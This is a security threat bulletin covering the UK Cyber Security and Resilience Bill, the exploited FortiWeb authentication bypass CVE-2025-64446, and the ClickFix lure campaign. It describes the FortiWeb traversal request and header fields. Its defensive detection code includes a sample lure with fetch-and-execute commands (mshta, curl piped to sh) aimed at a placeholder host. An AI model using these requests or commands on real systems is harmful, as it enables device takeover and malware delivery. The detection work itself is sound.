
NormCyber Threat Bulletin: 20th November 2025

UK Introduces Landmark Legislation to Fortify Cyber-Defences of Critical Infrastructure

On 12 November 2025, the United Kingdom government unveiled a sweeping legislative package aimed at bolstering the cybersecurity of its most vital national services. The Cyber Security and Resilience Bill, announced by the Department for Science, Innovation and Technology, represents a major reform of the existing regulatory regime for critical infrastructure. It builds on the foundation of the Network and Information Systems (NIS) Regulations 2018 and is designed to protect essential sectors such as healthcare, energy, water and transport from escalating cyber-threats.

A central pillar of the Bill is the imposition of mandatory security standards on medium and large service providers that deliver IT management, helpdesk and cybersecurity services to critical national infrastructure. For the first time, these managed-service providers will be required to develop robust incident-response plans and to report “significant cyber incidents” promptly to both the National Cyber Security Centre (NCSC) and the appropriate regulator — within 24 hours for initial notice, and with a full written report due within 72 hours. Furthermore, regulators will gain the power to formally designate key subcontractors and suppliers — for example, medical diagnostic firms or chemical suppliers for water utilities — as “critical suppliers”, making them subject to the same rigorous security obligations.

Under the proposed legislation, the Secretary of State will also receive new powers to issue directives to organisations and regulators in the name of national security. This could include compelling regulated entities, such as NHS trusts or major utility companies, to enhance system monitoring, segregate parts of their networks or take other protective steps when a cyber threat is judged to be serious enough. The Bill additionally proposes turnover-based penalties for non-compliance, thereby making cyber resilience a financial imperative rather than a discretionary cost. New provisions extend the regulatory framework to encompass data centres and emerging technology infrastructure, notably including entities that manage smart energy services such as electric vehicle charging stations.

The rationale behind this legislative push is grounded in fresh, independent research that estimates the average “significant cyberattack” in the UK now costs in excess of £190,000, with the total economic impact adding up to approximately £14.7 billion annually — roughly half a percent of the UK’s GDP. One particularly stark example referenced by the government is a cyber-attack on Jaguar Land Rover: that breach reportedly forced the company to shut down systems and resulted in losses of at least £1.9 billion, making it arguably the costliest single incident in British cyber history. To further underline the stakes, the Office for Budget Responsibility has projected that a serious attack on the country’s critical infrastructure could lead to a temporary increase in government borrowing by more than £30 billion.

To conclude, the Cyber Security and Resilience Bill marks a significant pivot in the UK’s approach to digital security, broadening the regulatory net to include a wider range of suppliers, strengthening the tools available to government and regulators, and introducing financial incentives to comply. If enacted, it will likely set a new standard for how modern economies defend themselves in an increasingly hostile cyber environment.


Critical FortiWeb Vulnerability Actively Exploited: Attackers Creating Admin Accounts


Security researchers have raised the alarm over a serious authentication bypass vulnerability in Fortinet’s FortiWeb Web Application Firewall (WAF) that is actively being abused in the wild. The flaw, now tracked as CVE-2025-64446, allows remote, unauthenticated attackers to create privileged administrator accounts on affected devices. The exploitation has been observed since early October 2025, and its impact is considerable.

According to the published analysis, attackers reach the FortiWeb management backend by sending a malicious HTTP POST request to a CGI endpoint. Specifically, they leverage a path traversal bug in the endpoint /api/v2.0/cmdb/system/admin%3F/../../../../../cgi-bin/fwbcgi to reach a binary called fwbcgi. Once accessed, the exploit uses a crafted CGIINFO header containing Base64-encoded JSON data to bypass authentication and impersonate administrative users.

Further technical analysis by watchTowr Labs reveals that this vulnerability is compounded by weaknesses in how FortiWeb handles the fwbcgi binary’s authentication mechanism. The attacker’s JSON payload must define four fields—username, profname, vdom, and loginname—which correspond to the built-in “admin” account by default. By supplying the correct values, attackers can effectively assume the identity of a fully privileged administrator and execute arbitrary administrative commands. This authentication bypass is particularly alarming because it grants full administrative control without needing to authenticate legitimately. The attackers reportedly use the vulnerability to create new admin-level accounts, thereby establishing persistent access to the compromised appliance.

Fortinet has since addressed the vulnerability in FortiWeb version 8.0.2, which patches the issue. The flaw affects earlier versions across multiple release lines: 8.0.0–8.0.1, 7.6.0–7.6.4, 7.4.0–7.4.9 and 7.2.0–7.2.11. Organisations that have not yet upgraded to a safe version are strongly urged to do so without delay. Additionally, as a temporary mitigation, users are advised to disable HTTP/HTTPS access on any publicly facing FortiWeb management interface. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has also added CVE-2025-64446 to its Known Exploited Vulnerabilities (KEV) catalogue, urging immediate remediation.
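Two defender-side checks for this item, written as an added example rather than Fortinet code or tooling: a version-range check against the affected releases the bulletin lists, and a heuristic that flags access-log entries matching the request shape described above (traversal into cgi-bin/fwbcgi, or a CGIINFO header, which ordinary clients never send). The log format and log lines are constructed for the example, and the CGIINFO value is a placeholder.

```python
from urllib.parse import unquote

# Affected ranges as listed in the bulletin; 8.0.2 is the fixed release.
AFFECTED = [((8, 0, 0), (8, 0, 1)), ((7, 6, 0), (7, 6, 4)),
            ((7, 4, 0), (7, 4, 9)), ((7, 2, 0), (7, 2, 11))]


def is_affected(version: str) -> bool:
    """True if a FortiWeb version string falls inside a vulnerable range."""
    ver = tuple(int(x) for x in version.strip().split("."))
    return any(lo <= ver <= hi for lo, hi in AFFECTED)


def is_suspicious_request(method: str, path: str, headers: dict) -> bool:
    """Match the request shape from the bulletin: a POST whose URL-decoded
    path traverses into cgi-bin/fwbcgi, or that carries a CGIINFO header."""
    decoded = unquote(unquote(path))          # tolerate double encoding
    reaches_fwbcgi = "cgi-bin/fwbcgi" in decoded
    traversal = "/../" in decoded
    has_cgiinfo = any(k.lower() == "cgiinfo" for k in headers)
    return method.upper() == "POST" and (
        (reaches_fwbcgi and traversal) or has_cgiinfo)


def scan_log(lines):
    """Scan constructed lines of the form 'METHOD PATH h1=v1;h2=v2'
    (a simplified access-log layout assumed for this example)."""
    flagged = []
    for line in lines:
        parts = line.split(" ", 2)
        if len(parts) < 2:
            continue
        headers = {}
        for kv in (parts[2].split(";") if len(parts) == 3 else []):
            if "=" in kv:
                k, v = kv.split("=", 1)
                headers[k.strip()] = v.strip()
        if is_suspicious_request(parts[0], parts[1], headers):
            flagged.append(line)
    return flagged


# Constructed sample: the first line mirrors the endpoint quoted in the
# bulletin; the CGIINFO value is a placeholder, not a real payload.
SAMPLE_LOG = [
    "POST /api/v2.0/cmdb/system/admin%3F/../../../../../cgi-bin/fwbcgi "
    "Host=fwb.example.net;CGIINFO=PLACEHOLDER_BASE64",
    "GET /api/v2.0/cmdb/system/admin Host=fwb.example.net",
    "POST /api/v2.0/cmdb/system/status Host=fwb.example.net",
]
```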


Evolving Threats: The “ClickFix” Malware Campaign Adapts to Multi-OS Environments

A notable escalation has emerged in the realm of browser-based social-engineering campaigns with the evolution of the malware campaign known as “ClickFix”. Security researchers at Push Security have observed that this threat actor has refined its techniques by expanding support across multiple operating systems and incorporating video tutorials, thereby enhancing its capacity to deceive users. This shift signals a departure from the more traditional text-based instruction pages towards a more convincing, multimedia approach that capitalises on urgency and user familiarity with online verification steps.

At the core of a ClickFix attack is the exploitation of trust: a user is directed to what appears to be a legitimate verification or software correction page—commonly disguised as a CAPTCHA challenge or identity check. Once the user has landed on the page, the campaign dynamically detects the operating system in use and presents instructions accordingly. For example, if the target is using Windows, macOS or Linux, the commands offered will differ to match that environment. Compounding the deception, a countdown timer is activated—typically of one minute—designed to pressure the recipient into rapid action, minimising deliberation and increasing the likelihood of executing commands without due caution. Moreover, a “users verified in the last hour” counter is displayed to further suggest legitimacy by simulating high-volume, normal behaviour.

The sophistication of the scheme is further illustrated by its inclusion of an embedded video tutorial rather than mere text instructions. This not only makes the instruction set appear more professional but also helps reduce the risk of user error by automating the copy-to-clipboard of malicious commands via JavaScript. In many cases, the commands will download and execute a payload—typically an information-stealer or similar type of malware. The operator may exploit known vulnerabilities in legitimate websites (for example outdated WordPress plug-ins) to inject malicious JavaScript, or employ search-engine poisoning to get the malicious page ranked prominently in results. The campaign’s adaptability is further underscored by its ability to deliver different payloads depending on the user’s operating system, ranging from MSHTA executables and PowerShell scripts on Windows to other living-off-the-land binaries on Linux or macOS platforms.

In conclusion, the ClickFix campaign represents a significant advance in social-engineering and malware-delivery methods: by combining multi-OS targeting, user-friendly video guides and real-time pressure mechanisms, the threat operators raise the bar for deception. As such, the campaign underscores the persistent need for user awareness, tight control over web-based command execution requests and diligent web-defence practices for modern enterprises and individuals alike.
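A content-scanning heuristic for the page traits the two paragraphs above describe (clipboard write of a command string, OS branching, fake verification wording, countdown timer, “verified in the last hour” counter), added here as an example and not Push Security’s detection logic. The regex set and the two HTML samples are constructed for the example; URLs in them are placeholders.

```python
import re

# One pattern per ClickFix trait from the bulletin (assumed indicators,
# not a vendor signature set).
INDICATORS = {
    "clipboard_write": re.compile(
        r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]", re.I),
    "os_branching": re.compile(r"navigator\.(userAgent|platform)", re.I),
    "fake_verification": re.compile(
        r"verify (you are|you're) human|not a robot|verification step", re.I),
    "countdown": re.compile(r"setInterval\(|countdown|seconds? left", re.I),
    "social_proof": re.compile(r"verified in the last hour", re.I),
    "lolbin_command": re.compile(
        r"\b(mshta|powershell|curl\b.*\|\s*(ba)?sh|bash -c|osascript)\b", re.I),
}


def score_page(html: str) -> dict:
    """Return which traits a page shows plus a verdict. A page is only
    flagged when it both writes to the clipboard and contains a shell or
    LOLBin command string; the remaining traits raise confidence."""
    hits = {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}
    core = hits["clipboard_write"] and hits["lolbin_command"]
    confidence = sum(hits.values())
    hits["verdict"] = ("clickfix_likely" if core and confidence >= 4
                       else "suspicious" if core else "clean")
    return hits


# Constructed lure page: OS-dependent command copied on click, 60-second
# timer and a social-proof counter, as described in the bulletin.
CLICKFIX_SAMPLE = """
<h2>Verify you are human</h2>
<p><span id="left">60</span> seconds left to complete verification</p>
<p>1,284 users verified in the last hour</p>
<video src="howto.mp4"></video>
<script>
  var cmd = /Windows/.test(navigator.userAgent)
      ? 'mshta http://PLACEHOLDER.invalid/v'
      : 'curl -s http://PLACEHOLDER.invalid/v | sh';
  setInterval(function(){ left.textContent--; }, 1000);
  document.getElementById('btn').onclick = function(){
      navigator.clipboard.writeText(cmd); };
</script>"""

# Constructed benign page: copies the page title, no command string.
BENIGN_SAMPLE = """
<h2>Verify you are human</h2>
<script>
  document.getElementById('copy').onclick = function(){
      navigator.clipboard.writeText(document.title); };
</script>"""
```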

